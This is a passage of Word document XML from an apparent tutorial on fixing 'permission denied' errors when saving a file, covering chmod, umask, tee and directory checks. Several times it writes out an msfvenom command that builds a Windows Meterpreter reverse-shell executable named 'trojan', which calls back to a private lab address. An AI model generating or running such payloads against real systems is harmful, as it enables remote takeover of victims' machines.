          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.128 LPORT=4444 -f exe &gt; trojan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3) Set the correct permissions on the target directory: You can also change the permissions of the directory to allow writing. For example, if you want to write to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod u+w /path/to/directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /path/to/directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.128 LPORT=4444 -f exe &gt; trojan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4) Check for restrictive umask settings: Ensure that your umask settings are not too restrictive. You can check your current umask with, type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">umask</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A common umask value is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0022</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If it is too restrictive, you can temporarily set it to a less restrictive value:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">umask 0022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.128 LPORT=4444 -f exe &gt; trojan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7"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rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And still if you are getting permission denied like above then go for this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check File Creation with Redirection (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">): Sometimes, the permission denied error might be due to the redirection itself. Try creating a simple file with redirection to see if the problem persists type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "test" &gt; testfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get a permission denied error here as well, it confirms that the issue is with file creation permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tee</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Output Redirection: You can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tee</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to write the output to a file, which might bypass some permission issues type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.128 LPORT=4444 -f exe | sudo tee trojan &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check Directory Permissions: Ensure that the directory you're trying to write to has the correct permissions type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:color w:val="38761d"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -ld $(pwd)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>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Create File in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
